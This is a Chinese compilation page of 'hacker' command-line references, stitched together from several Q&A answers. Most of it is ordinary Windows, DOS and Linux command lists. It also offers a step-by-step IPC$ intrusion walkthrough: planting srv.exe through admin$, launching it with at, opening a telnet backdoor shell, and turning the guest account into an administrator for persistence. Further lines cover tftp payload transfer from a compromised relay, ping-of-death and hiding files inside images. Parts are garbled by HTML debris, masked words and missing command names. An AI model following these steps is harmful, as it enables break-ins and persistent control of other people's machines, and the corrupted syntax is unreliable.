㈠ 請問新手學黑客攻防要記哪些命令
黑客常用命令(不太全,只是我個人常用的)、、、、、 ping 測試
ping -a ip 對目標ip地址進行反向名稱解析,如果解析成功,ping將顯示相應的主機名
ping IP -t 連續對IP地址執行PING命令直到CTRL+C中斷
ping IP -l 3000 指定PING命令中的數據長度為3000位元組
netstat( local address本地地址,foreign address外部地址)
netstat -s 查看本機網路配置信息
netstat -e 查看連接數據包
netstat -r 查看路由表的各種信息
netstat -n 顯示已建立連接
netstat -v 顯示正在進行的工作
netstat -t 顯示TCP協議的連接情況
netstat -a 顯示所有SOCKET,包括正在監聽的
netstat -u 顯示UDP協議的連接情況
nslookup 域名 查詢A記錄
nslookup -q=mx 域名 查詢MX記錄
nslookup -q=ns 域名 查詢ns記錄
ipconfig 查看自己的本地連接和寬頻連接
ipconfig /all 顯示IP地址MAC地址等附加信息
ipconfig /batch bak-netcfg 將有關網路配置的信息備份到文件BAK-NETCFG中
ipconfig /release 1 去除網卡(適配器1)的動態IP地址
ipconfig /renew 1 為網卡重新動態分配IP地址
tracert 解析路由
dir 列出當前路徑下的文件
dir /a 列出當前路徑下所有文件包含隱藏的系統的文件
dir /ah 列出當前路徑下隱藏的文件包括子目錄隱藏的
dir /as 列出系統文件
dir /ad 列出子目錄
dir /B 只顯示文件名與擴展名
nbtstat -a IP 查看指定IP主機的NETBIOS信息
COPY命令巧妙捆綁:
456.jpg/b + 123.txt/a 789.jpg
首先CD命令到文件的存放位置,456.jpg--文件名,123.txt--文件名,789.jpg--生成的789圖片文件。/b--用於指定以二進制格式復制合並文件,/a--用於指定以ASCLL格式復制合並文件,二進制格式文件應該在+前,文本格式文件在+後。
cls 清屏命令
net user 系統賬號類操作
net user 賬號 密碼 /add 建立賬號命令
net user 賬號 密碼 /dll 刪除賬號命令
net localgroup 系統組操作
net use 遠程連接 映射操作
net use \\IP\ipc$ "密碼" /user:"用戶" IPC¥連接
net use z: \\IP\c$ 映射網路驅動器(C盤到本地E盤)
net use * /del 斷開所有IPC連接
net use \\IP\ipc$ /del 斷開指定IP目標IPC連接
net time \\IP 查看目標主機的時間
把一個文件拷貝到另一個地方(參照遠程添加用戶)
at 用來建立計劃任務(參照遠程添加用戶)
net user 用來管理計算機上面的帳號(參照遠程添加用戶)
net localgroup 用來管理工作組(參照遠程添加用戶)
net send 信使命令
net start messenger 開啟信使服務messenger
net stop messenger 關閉服務
net * 內容 向區域網所有用戶發送消息
遠程添加用戶:
net user 用戶名 密碼 /add
net localgroup administrators 用戶名 /add
命令一:添加一個用戶
命令二:表示把用戶添加到管理員組(administrators)
打開記事本,鍵入上面的命令,把該文件另存為後墜名是.bat的文件(這里記為hack.bat)
轉到存放hack.bat的目錄(比如D盤),鍵入 hack.bat \\目標IP\c$ (這樣就把hack.bat拷貝到了目標主機的C盤)
首先鍵入:net time \\目標IP 查看目標主機的時間,再鍵入: at \\目標IP 時間 要執行的命令。例:at \\192.168.1.1 c:hack.bat
net share 查看本機共享資源
at \\IP 時間 net share c: 使用計劃任務開啟共享資源
md f:\123..\ 建立超級文件夾(F指本地磁碟,123指文件夾名)
start f:\123..\ 進入超級文件夾
rd f:\123..\ 刪除超級文件夾
shutdown -i 打開(關閉計算機)界面,可關指定遠程計算機
shutdown -l 注銷本計算機
shutdown -s 關閉本計算機
shutdown -r 關閉並重啟本計算機
shutdown -a 放棄系統關機
shutdown -m \\(計算機名或IP) -s 遠程關閉計算機
shutdown -m \\(計算機名或IP) -r 遠程重啟計算機
shutdown -m \\(計算機名或IP) -a 遠程命令放棄
shutdown -t xx 設置關閉的超時為幾秒(xx表示秒)
shutdown -c "comment" 關閉注釋(最大127字元)
shutdown -f 強制運行的應用程序關閉而沒有警告
shutdown -d [u][p]:xx:yy 關閉原因代碼(u是用戶代碼,p是一個計劃的代碼,xx是一個主要原因代碼[小於256的正整數],yy是一個次要原因代碼[小於65536的正整數])
at 22:00 Shutdown -s 22:00關機
del d:文件夾\文件名 刪除文件,d:指盤符。
cd.. 進入上一層
cd (文件夾名) 進入指定的文件夾
d: 進入D盤
nbtstat -a 計算機名或IP 顯示指定計算機NETBIOS信息
nbtstat -n 顯示本計算機的NETBIOS信息
nbtstat -c 顯示本計算機NEBIOS名稱緩存的內容
arp -a Ip 如果我們有多個網卡,那麼使用arp -a加上介面的Ip地址,就可以只顯示與該介面相關的ARp緩存項目。
arp -s Ip MAC物理地址 綁定其他電腦MAC地址,IP為:目標IP。
arp -d Ip 人工刪除一個靜態項目(MAC地址)。
format d: 格式化命令,d:代表盤符
format d:/q 快速格式化
format d:/u 無條件格式化
㈡ 當黑客要懂得哪些主要的CMD命令
net use \ip\ipc$ " " /user:" " 建立IPC空鏈接
net use \ip\ipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接
net use h: \ip\c$ "密碼" /user:"用戶名" 直接登陸後映射對方C:到本地為H:
net use h: \ip\c$ 登陸後映射對方C:到本地為H:
net use \ip\ipc$ /del 刪除IPC鏈接
net use h: /del 刪除映射對方到本地的為H:的映射
net user 用戶名 密碼 /add 建立用戶
net user guest /active:yes 激活guest用戶
net user 查看有哪些用戶
net user 帳戶名 查看帳戶的屬性
net localgroup ***istrators 用戶名 /add 把「用戶」添加到管理員中使其具
有管理員許可權,注意:***istrator後加s用復數
net start 查看開啟了哪些服務
net start 服務名 開啟服務;(如:net start telnet, net start schele)
net stop 服務名 停止某服務
net time \目標ip 查看對方時間
net time \目標ip /set 設置本地計算機時間與「目標IP」主機的時間同步,加上
參數/yes可取消確認信息
net view 查看本地區域網內開啟了哪些共享
net view \ip 查看對方區域網內開啟了哪些共享
net config 顯示系統網路設置
net logoff 斷開連接的共享
net pause 服務名 暫停某服務
net send ip "文本信息" 向對方發信息
net ver 區域網內正在使用的網路連接類型和信息
net share 查看本地開啟的共享
net share ipc$ 開啟ipc
net share ipc$ /del 刪除ipc
net share c$ /del 刪除C:共享
net user guest 12345 用guest用戶登陸後用將密碼改為12345
net password 密碼 更改系統登陸密碼
netstat -a 查看開啟了哪些埠,常用netstat -an
netstat -n 查看埠的網路連接情況,常用netstat -an
netstat -v 查看正在進行的工作
netstat -p 協議名 例:netstat -p tcq/ip 查看某協議使用情況(查看tcp/ip
協議使用情況)
netstat -s 查看正在使用的所有協議使用情況
nbtstat -A ip 對方136到139其中一個埠開了的話,就可查看對方最近登陸的
用戶名(03前的為用戶名)-注意:參數-A要大寫
tracert -參數 ip(或計算機名) 跟蹤路由(數據包),參數:「-w數字」用於設
置超時間隔。
ping ip(或域名) 向對方主機發送默認大小為32位元組的數據,參數:「-l[空格]
數據包大小」;「-n發送數據次數」;「-t」指一直ping。
ping -t -l 65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之
ping)
ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址,
ipconfig可用參數「/all」顯示全部配置信息
tlist -t 以樹行列表顯示進程(為系統的附加工具,默認是沒有安裝的,在安裝
目錄的Support/tools文件夾內)
kill -F 進程名加-F參數後強制結束某進程(為系統的附加工具,默認是沒有安
裝的,在安裝目錄的Support/tools文件夾內)
del -F 文件名加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除
只讀、隱藏、系統、存檔文件,/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏
、系統、存檔以外的文件。例如「DEL/AR *.*」表示刪除當前目錄下所有隻讀文
件,「DEL/A-S *.*」表示刪除當前目錄下除系統文件以外的所有文件
move 盤符\路徑\要移動的文件名存放移動文件的路徑\移動後文件名 移動文件,
用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋
fc one.txt two.txt > 3st.txt 對比二個文件並把不同之處輸出到3st.txt文件
中,"> "和"> >" 是重定向命令
at id號 開啟已注冊的某個計劃任務
at /delete 停止所有計劃任務,用參數/yes則不需要確認就直接停止
at id號 /delete 停止某個已注冊的計劃任務
at 查看所有的計劃任務
at \ip time 程序名(或一個命令) /r 在某時間運行對方某程序並重新啟動計算
機
finger username @host 查看最近有哪些用戶登陸
telnet ip 埠遠和登陸伺服器,默認埠為23
open ip 連接到IP(屬telnet登陸後的命令)
telnet 在本機上直接鍵入telnet 將進入本機的telnet
路徑\文件名1 路徑\文件名2 /y 復制文件1到指定的目錄為文件2,用參
數/y就同時取消確認你要改寫一份現存目錄文件
c:\srv.exe \ip\***$ 復制本地c:\srv.exe到對方的***下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成
3st.jpg新的文件,註:2st.txt文件頭要空三排,參數:/b指二進制文件,/a指
ASCLL格式文件
\ip\***$\svv.exe c:\ 或:\ip\***$\*.* 復制對方***i.exe文件(所
有文件)至本地C:
x 要復制的文件或目錄樹 目標地址\目錄名復制文件和目錄樹,用參數/Y將
不提示覆蓋相同文件
tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe c:\server.exe
登陸後,將「IP」的server.exe下載到目標主機c:\server.exe 參數:-i指以二
進制模式傳送,如傳送exe文件時用,如不加-i 則以ASCII模式(傳送文本文件模
式)進行傳送
tftp -i 對方IP put c:\server.exe 登陸後,上傳本地c:\server.exe至主機
ftp ip 埠用於上傳文件至伺服器或進行文件操作,默認埠為21。bin指用二
進制方式傳送(可執行文件進);默認為ASCII格式傳送(文本文件時)
route print 顯示出IP路由,將主要顯示網路地址Network addres,子網掩碼
Netmask,網關地址Gateway addres,介面地址Interface
arp 查看和處理ARP緩存,ARP是名字解析的意思,負責把一個IP解析成一個物理
性的MAC地址。arp -a將顯示出全部信息
arp -s ip 物理地址 想ARP高速緩存中人工輸入一個靜態項目 ,該項目在計算機引導過程中將保持有效狀態,或者出現錯誤的時候 人工配置的物理地址將更新本項目
arp -d ip 本命令能人工栓除一個靜態項目
start 程序名或命令 /max 或/min 新開一個新窗口並最大化(最小化)運行某程
序或命令
mem 查看cpu使用情況
attrib 文件名(目錄名) 查看某文件(目錄)的屬性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存檔,只讀
,系統,隱藏屬性;用+則是添加為某屬性
dir 查看文件,參數:/Q顯示文件及目錄屬系統哪個用戶,/T:C顯示文件創建時
間,/T:A顯示文件上次被訪問時間,/T:W上次被修改時間
date /t 、 time /t 使用此參數即「DATE/T」、「TIME/T」將只顯示當前日期和
時間,而不必輸入新日期和時間
set 指定環境變數名稱=要指派給變數的字元設置環境變數
set 顯示當前所有的環境變數
set p 顯示以P開頭的環境變數
㈢ 黑客dos命令大全
最主要的是以下幾個命令:
netsh
telnet
net use
net share
提醒:學習黑客技術,應當用於反黑客。別拿來干壞事。
㈣ 黑客必備的基礎命令(DOS UNIX/linux WINDOWS)
windows
cd (change directory) 更改目錄
dir (directory) 查看文件夾下內容
edit 編輯文件
linux
ls (list) 查看文件夾下內容
cd (change directory) 更改目錄
whoami 用戶帳號
cp () 復制
mkdir (make directory) 建立目錄
mv (move) 移動文件
rm (remove) 刪除文件
cat (concatenate) 查看文件內容
vi (visual edit) 編輯文件
ifconfig (ip configuration) 設置/查看網路配置
chmod (change file mode bits) 更改目錄/文件許可權
chown (change owner) 更改用戶所有者
㈤ 跪求cmd黑客攻擊指令和cmd電腦命令!懸賞大大滴有
一 相關命令
建立空連接:
net use \\IP\ipc$ "" /user:"" (一定要注意:這一行命令中包含了3個空格)
建立非空連接:
net use \\IP\ipc$ "用戶名" /user:"密碼" (同樣有3個空格)
映射默認共享:
net use z: \\IP\c$ "密碼" /user:"用戶名" (即可將對方的c盤映射為自己的z盤,其他盤類推)
如果已經和目標建立了ipc$,則可以直接用IP+盤符+$訪問,具體命令 net use z: \\IP\c$
刪除一個ipc$連接
net use \\IP\ipc$ /del
刪除共享映射
net use c: /del 刪除映射的c盤,其他盤類推
net use * /del 刪除全部,會有提示要求按y確認
提示:對於不熟悉命令行操作的朋友來說.建立ipc$連接後,可以在"我的電腦"或"網上鄰居"右鍵映射網路驅動器,效果一樣.
二 經典入侵模式
1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"
這是用《流光》掃到的用戶名是administrators,密碼為"空"的IP地址(空口令?哇,運氣好到家了),如果是打算攻擊的話,就可以用這樣的命令來與127.0.0.1建立一個連接,因為密碼為"空",所以第一個引號處就不用輸入,後面一個雙引號里的是用戶名,輸入administrators,命令即可成功完成。
2. C:\> srv.exe \\127.0.0.1\admin$
先復制srv.exe上去,在流光的Tools目錄下就有(這里的$是指admin用戶的c:\winnt\system32\,大家還可以使用c$、d$,意思是C盤與D盤,這看你要復制到什麼地方去了)。
3. C:\>net time \\127.0.0.1
查查時間,發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00,命令成功完成。
4. C:\>at \\127.0.0.1 11:05 srv.exe
用at命令啟動srv.exe吧(這里設置的時間要比主機時間快,不然你怎麼啟動啊,呵呵!)
5. C:\>net time \\127.0.0.1
再查查到時間沒有?如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05,那就准備開始下面的命令。
6. C:\>telnet 127.0.0.1 99
這里會用到Telnet命令吧,注意埠是99。Telnet默認的是23埠,但是我們使用的是SRV在對方計算機中為我們建立一個99埠的Shell。
雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打算建立一個Telnet服務!這就要用到ntlm了
7.C:\> ntlm.exe \\127.0.0.1\admin$
用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。
8. C:\WINNT\system32>ntlm
輸入ntlm啟動(這里的C:\WINNT\system32>指的是對方計算機,運行ntlm其實是讓這個程序在對方計算機上運行)。當出現"DONE"的時候,就說明已經啟動正常。然後使用"net start telnet"來開啟Telnet服務!
9.Telnet 127.0.0.1,接著輸入用戶名與密碼就進入對方了,操作就像在DOS上操作一樣簡單!(然後你想做什麼?想做什麼就做什麼吧,哈哈)
為了以防萬一,我們再把guest激活加到管理組
10. C:\>net user guest /active:yes
將對方的Guest用戶激活
11. C:\>net user guest 1234
將Guest的密碼改為1234,或者你要設定的密碼
12. C:\>net localgroup administrators guest /add
將Guest變為Administrator^_^(如果管理員密碼更改,guest帳號沒改變的話,下次我們可以用guest再次訪問這台計算機).
ipc$經典入侵步驟:
1、net use \\ip\ipc$ 密碼 /user:用戶名
2、 文件名 \\ip\c$
3、net time \\ip
4、at \\ip 時間 命令
5、入侵成功,連接你的肉雞
常用的網路命令
net user 查看用戶列表
net user 用戶名 密碼 /add 添加用戶
net user 用戶名 密碼 更改用戶密碼
net localgroup administrators 用戶名 /add 添加用戶到管理組
net user 用戶名 /delete 刪除用戶
net user 用戶名 查看用戶的基本情況
net user 用戶名 /active:no 禁用該用戶
net user 用戶名 /active:yes 啟用該用戶
net share 查看計算機IPC$共享資源
net share 共享名 查看該共享的情況
net share 共享名=路徑 設置共享。例如 net share c$=c:
net share 共享名 /delete 刪除IPC$共享
net stop lanmanserver 關閉ipc$和默認共享依賴的服務
net use 查看IPC$連接情況
net use \\ip\ipc$ "密碼" /user:"用戶名" ipc$連接
net use \\ip\ipc$ /del 刪除一個連接
net use z: \\目標IP\c$ "密碼" /user:"用戶名" 將對方的c盤映射為自己的z盤
net use z: /del
net time \\ip 查看遠程計算機上的時間
路徑:\文件名 \\ip\共享名復制文件到已經ipc$連接的計算機上
net view ip 查看計算機上的共享資源
at 查看自己計算機上的計劃作業
at \\ip 查看遠程計算機上的計劃作業
at \\ip 時間 命令(注意加盤符) 在遠程計算機上加一個作業
at \\ip 計劃作業ID /delete 刪除遠程計算機上的一個計劃作業
at \\ip all /delete 刪除遠程計算機上的全部計劃作業
at \\ip time "echo 5 > c:\t.txt" 在遠程計算機上建立文本文件t.txt;
下面純手打,上面是度娘給的
taskkill /im 進程名 停止運行
tasklisy 查看運行進程
ipconfig 查看本機IP
md 創建文件夾
rd 刪除文件夾
echo off > .txt|exit 添加文本
echo 內容 >> .txt 給文本添加內容
復制文件
net user 用戶名 密碼/add 創建一個普通賬號
net localgroup administrators 用戶名 /add 把賬戶加入超級用戶組
㈥ 黑客常有的dos命令
黑客常用DOS命令:
net use $">\\ip\ipc$Content$nbsp;" " /user:" " 建立IPC空鏈接
net use $">\\ip\ipc$Content$nbsp;"密碼" /user:"用戶名" 建立IPC非空鏈接
net use h: $">\\ip\c$Content$nbsp;"密碼" /user:"用戶名" 直接登陸後映射對方C:到本地為H:
net use h: $">\\ip\c$Content$nbsp;登陸後映射對方C:到本地為H:
net use $">\\ip\ipc$Content$nbsp;/del 刪除IPC鏈接
net use h: /del 刪除映射對方到本地的為H:的映射
net user 用戶名 密碼 /add 建立用戶
net user guest /active:yes 激活guest用戶
net user 查看有哪些用戶
net user 帳戶名 查看帳戶的屬性
net localgroup administrators 用戶名 /add 把「用戶」添加到管理員中使其具有管理員許可權,注意:administrator後加s用復數
net start 查看開啟了哪些服務
net start 服務名 開啟服務;(如:net start telnet, net start schele)
net stop 服務名 停止某服務
net time \\目標ip 查看對方時間
net time \\目標ip /set 設置本地計算機時間與「目標IP」主機的時間同步,加上參數/yes可取消確認信息
net view 查看本地區域網內開啟了哪些共享
net view \\ip 查看對方區域網內開啟了哪些共享
net config 顯示系統網路設置
net logoff 斷開連接的共享
net pause 服務名 暫停某服務
net send ip "文本信息" 向對方發信息
net ver 區域網內正在使用的網路連接類型和信息
net share 查看本地開啟的共享
net share ipc$Content$nbsp;開啟ipc$共享
net share ipc$Content$nbsp;/del 刪除ipc$共享
net share c$Content$nbsp;/del 刪除C:共享
net user guest 12345 用guest用戶登陸後用將密碼改為12345
net password 密碼 更改系統登陸密碼
netstat -a 查看開啟了哪些埠,常用netstat -an
netstat -n 查看埠的網路連接情況,常用netstat -an
netstat -v 查看正在進行的工作
netstat -p 協議名 例:netstat -p tcq/ip 查看某協議使用情況(查看tcp/ip協議使用情況)
netstat -s 查看正在使用的所有協議使用情況
nbtstat -A ip 對方136到139其中一個埠開了的話,就可查看對方最近登陸的用戶名(03前的為用戶名)-注意:參數-A要大寫
tracert -參數 ip(或計算機名) 跟蹤路由(數據包),參數:「-w數字」用於設置超時間隔。
ping ip(或域名) 向對方主機發送默認大小為32位元組的數據,參數:「-l[空格]數據包大小」;「-n發送數據次數」;「-t」指一直ping。
ping -t -l 65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)
ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用參數「/all」顯示全部配置信息
tlist -t 以樹行列表顯示進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)
kill -F 進程名 加-F參數後強制結束某進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)
del -F 文件名加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件,/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如「DEL/AR *.*」表示刪除當前目錄下所有隻讀文件,「DEL/A-S *.*」表示刪除當前目錄下除系統文件以外的所有文件
del /S /Q 目錄 或用:rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和文件。同時使用參數/Q 可取消刪除操作時的系統確認就直接刪除。(二個命令作用相同)
move 盤符\路徑\要移動的文件名 存放移動文件的路徑\移動後文件名 移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋
fc one.txt two.txt > 3st.txt 對比二個文件並把不同之處輸出到3st.txt文件中,"> "和"> >" 是重定向命令
at id號 開啟已注冊的某個計劃任務
at /delete 停止所有計劃任務,用參數/yes則不需要確認就直接停止
at id號 /delete 停止某個已注冊的計劃任務
at 查看所有的計劃任務
at \\ip time 程序名(或一個命令) /r 在某時間運行對方某程序並重新啟動計算機
finger username @host 查看最近有哪些用戶登陸
telnet ip 埠 遠和登陸伺服器,默認埠為23
open ip 連接到IP(屬telnet登陸後的命令)
telnet 在本機上直接鍵入telnet 將進入本機的telnet
路徑\文件名1 路徑\文件名2 /y 復制文件1到指定的目錄為文件2,用參數/y就同時取消確認你要改寫一份現存目錄文件
c:\srv.exe $">\\ip\admin$Content$nbsp;復制本地c:\srv.exe到對方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件,註:2st.txt文件頭要空三排,參數:/b指二進制文件,/a指ASCLL格式文件
$\svv.exe">\\ip\admin$\svv.exe c:\ 或:\\ip\admin$\*.* 復制對方admini$共享下的srv.exe文件(所有文件)至本地C:
x 要復制的文件或目錄樹 目標地址\目錄名 復制文件和目錄樹,用參數/Y將不提示覆蓋相同文件
tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe c:\server.exe 登陸後,將「IP」的server.exe下載到目標主機c:\server.exe 參數:-i指以二進制模式傳送,如傳送exe文件時用,如不加-i 則以ASCII模式(傳送文本文件模式)進行傳送
tftp -i 對方IP put c:\server.exe 登陸後,上傳本地c:\server.exe至主機
ftp ip 埠 用於上傳文件至伺服器或進行文件操作,默認埠為21。bin指用二進制方式傳送(可執行文件進);默認為ASCII格式傳送(文本文件時)
route print 顯示出IP路由,將主要顯示網路地址Network addres,子網掩碼Netmask,網關地址Gateway addres,介面地址Interface
arp 查看和處理ARP緩存,ARP是名字解析的意思,負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出全部信息
start 程序名或命令 /max 或/min 新開一個新窗口並最大化(最小化)運行某程序或命令
mem 查看cpu使用情況
attrib 文件名(目錄名) 查看某文件(目錄)的屬性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存檔,只讀,系統,隱藏 屬性;用+則是添加為某屬性
dir 查看文件,參數:/Q顯示文件及目錄屬系統哪個用戶,/T:C顯示文件創建時間,/T:A顯示文件上次被訪問時間,/T:W上次被修改時間
date /t 、 time /t 使用此參數即「DATE/T」、「TIME/T」將只顯示當前日期和時間,而不必輸入新日期和時間
set 指定環境變數名稱=要指派給變數的字元 設置環境變數
set 顯示當前所有的環境變數
set p(或其它字元) 顯示出當前以字元p(或其它字元)開頭的所有環境變數
pause 暫停批處理程序,並顯示出:請按任意鍵繼續....
if 在批處理程序中執行條件處理(更多說明見if命令及變數)
goto 標簽 將cmd.exe導向到批處理程序中帶標簽的行(標簽必須單獨一行,且以冒號打頭,例如:「:start」標簽)
call 路徑\批處理文件名 從批處理程序中調用另一個批處理程序 (更多說明見call /?)
for 對一組文件中的每一個文件執行某個特定命令(更多說明見for命令及變數)
echo on或off 打開或關閉echo,僅用echo不加參數則顯示當前echo設置
echo 信息 在屏幕上顯示出信息
echo 信息 >> pass.txt 將"信息"保存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt文件中尋找字元串hello
find 文件名 查找某文件
title 標題名字 更改CMD窗口標題名字
color 顏色值 設置cmd控制台前景和背景顏色;0=黑、1=藍、2=綠、3=淺綠、4=紅、5=紫、6=黃、7=白、8=灰、9=淡藍、A=淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白
prompt 名稱 更改cmd.exe的顯示的命令提示符(把C:\、D:\統一改為:EntSky\ )
print 文件名 列印文本文件
ver 在DOS窗口下顯示版本信息
winver 彈出一個窗口顯示版本信息(內存大小、系統版本、補丁版本、計算機名)
format 盤符 /FS:類型 格式化磁碟,類型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS
md 目錄名 創建目錄
replace 源文件 要替換文件的目錄 替換文件
ren 原文件名 新文件名 重命名文件名
tree 以樹形結構顯示出目錄,用參數-f 將列出第個文件夾中文件名稱
type 文件名 顯示文本文件的內容
more 文件名 逐屏顯示輸出文件
doskey 要鎖定的命令=字元
doskey 要解鎖命令= 為DOS提供的鎖定命令(編輯命令行,重新調用win2k命令,並創建宏)。如:鎖定dir命令:doskey dir=entsky (不能用doskey dir=dir);解鎖:
doskey dir= taskmgr 調出任務管理器 chkdsk /F D: 檢查磁碟D並顯示狀態報告;加參數/f並修復磁碟上的錯誤 tlntadmn telnt服務admn,鍵入tlntadmn選擇3,再選擇8,就可以更改telnet服務默認埠23為其它任何埠 exit 退出cmd.exe程序或目前,用參數/B則是退出當前批處理腳本而不是cmd.exe path 路徑\可執行文件的文件名為可執行文件設置一個路徑。 cmd 啟動一個win2K命令解釋窗口。參數:/eff、/en 關閉、開啟命令擴展;更我詳細說明見cmd /? regedit /s 注冊表文件名 導入注冊表;參數/S指安靜模式導入,無任何提示; regedit /e 注冊表文件名 導出注冊表 cacls 文件名 參數 顯示或修改文件訪問控制列表(ACL)——針對NTFS格式時。參數:/D 用戶名:設定拒絕某用戶訪問;/P 用戶名:perm 替換指定用戶的訪問許可權;/G 用戶名:perm 賦予指定用戶訪問許可權;Perm 可以是: N 無,R 讀取, W 寫入, C 更改(寫入),F 完全控制;例:cacls D:\test.txt /D pub 設定d:\test.txt拒絕pub用戶訪問。 cacls 文件名 查看文件的訪問用戶許可權列表 REM 文本內容 在批處理文件中添加註解 netsh 查看或更改本地網路配置情況 IIS服務命令: iisreset /reboot 重啟win2k計算機(但有提示系統將重啟信息出現) iisreset /start或stop 啟動(停止)所有Internet服務 iisreset /restart 停止然後重新啟動所有Internet服務 iisreset /status 顯示所有Internet服務狀態 iisreset /enable或disable 在本地系統上啟用(禁用)Internet服務的重新啟動 iisreset /rebootonerror 當啟動、停止或重新啟動Internet服務時,若發生錯誤將重新開機 iisreset /noforce 若無法停止Internet服務,將不會強制終止Internet服務 iisreset /timeout Val在到達逾時間(秒)時,仍未停止Internet服務,若指定/rebootonerror參數,則電腦將會重新開機。預設值為重新啟動20秒,停止60秒,重新開機0秒。 FTP 命令: (後面有詳細說明內容) ftp的命令行格式為: ftp -v -d -i -n -g[主機名] -v 顯示遠程伺服器的所有響應信息。 -d 使用調試方式。 -n 限制ftp的自動登錄,即不使用.netrc文件。 -g 取消全局文件名。 help [命令] 或 ?[命令] 查看命令說明 bye 或 quit 終止主機FTP進程,並退出FTP管理方式. pwd 列出當前遠端主機目錄 put 或 send 本地文件名 [上傳到主機上的文件名] 將本地一個文件傳送至遠端主機中 get 或 recv [遠程主機文件名] [下載到本地後的文件名] 從遠端主機中傳送至本地主機中 mget [remote-files] 從遠端主機接收一批文件至本地主機 mput local-files 將本地主機中一批文件傳送至遠端主機 dir 或 ls [remote-directory] [local-file] 列出當前遠端主機目錄中的文件.如果有本地文件,就將結果寫至本地文件 ascii 設定以ASCII方式傳送文件(預設值) bin 或 image 設定以二進制方式傳送文件 bell 每完成一次文件傳送,報警提示 cp 返回上一級目錄 close 中斷與遠程伺服器的ftp會話(與open對應) open host[port] 建立指定ftp伺服器連接,可指定連接埠 delete 刪除遠端主機中的文件 mdelete [remote-files] 刪除一批文件
㈦ 命令有哪些 黑客CMD Ping命令大全
1. gpedit.msc-----組策略
2. sndrec32-------錄音機
3. Nslookup-------IP地址偵測器 ,是一個 監測網路中 DNS 伺服器是否能正確實現域名解析的命令行工具。 它在 Windows NT/2000/XP 中均可使用 , 但在 Windows 98 中卻沒有集成這一個工具。
4. explorer-------打開資源管理器
5. logoff---------注銷命令
6. shutdown-------60秒倒計時關機命令
7. lusrmgr.msc----本機用戶和組
8. services.msc---本地服務設置
9. oobe/msoobe /a----檢查XP是否激活
10. notepad--------打開記事本
11. cleanmgr-------垃圾整理
12. net start messenger----開始信使服務
13. compmgmt.msc---計算機管理
14. net stop messenger-----停止信使服務
15. conf-----------啟動netmeeting
16. dvdplay--------DVD播放器
17. charmap--------啟動字元映射表
18. diskmgmt.msc---磁碟管理實用程序
19. calc-----------啟動計算器
20. dfrg.msc-------磁碟碎片整理程序
21. chkdsk.exe-----Chkdsk磁碟檢查
22. devmgmt.msc--- 設備管理器
23. regsvr32 /u *.dll----停止dll文件運行
24. drwtsn32------ 系統醫生
25. rononce -p----15秒關機
26. dxdiag---------檢查DirectX信息
27. regedt32-------注冊表編輯器
28. Msconfig.exe---系統配置實用程序
29. rsop.msc-------組策略結果集
30. mem.exe--------顯示內存使用情況
31. regedit.exe----注冊表
32. winchat--------XP自帶區域網聊天
33. progman--------程序管理器
34. winmsd---------系統信息
35. perfmon.msc----計算機性能監測程序
36. winver---------檢查Windows版本
37. sfc /scannow-----掃描錯誤並復原
38. taskmgr-----任務管理器(2000/xp/2003
40. wmimgmt.msc----打開windows管理體系結構(WMI)
41. wupdmgr--------windows更新程序
42. wscript--------windows腳本宿主設置
43. write----------寫字板
45. wiaacmgr-------掃描儀和照相機向導
46. winchat--------XP自帶區域網聊天
49. mplayer2-------簡易widnows media player
50. mspaint--------畫圖板
51. mstsc----------遠程桌面連接
53. magnify--------放大鏡實用程序
54. mmc------------打開控制台
55. mobsync--------同步命令
57. iexpress-------木馬捆綁工具,系統自帶
58. fsmgmt.msc-----共享文件夾管理器
59. utilman--------輔助工具管理器
61. dcomcnfg-------打開系統組件服務
62. ddeshare-------打開DDE共享設置
110. osk------------打開屏幕鍵盤
111. odbcad32-------ODBC數據源管理器
112. oobe/msoobe /a----檢查XP是否激活
68. ntbackup-------系統備份和還原
69. narrator-------屏幕「講述人」
70. ntmsmgr.msc----移動存儲管理器
71. ntmsoprq.msc---移動存儲管理員操作請求
72. netstat -an----(TC)命令檢查介面
73. syncapp--------創建一個公文包
74. sysedit--------系統配置編輯器
75. sigverif-------文件簽名驗證程序
76. ciadv.msc------索引服務程序
77. shrpubw--------創建共享文件夾
78. secpol.msc-----本地安全策略
79. syskey---------系統加密,一旦加密就不能解開,保護windows xp系統的雙重密碼
80. services.msc---本地服務設置
81. Sndvol32-------音量控製程序
82. sfc.exe--------系統文件檢查器
83. sfc /scannow---windows文件保護
84. ciadv.msc------索引服務程序
85. tourstart------xp簡介(安裝完成後出現的漫遊xp程序)
86. taskmgr--------任務管理器
87. eventvwr-------事件查看器
88. eudcedit-------造字程序
89. compmgmt.msc---計算機管理
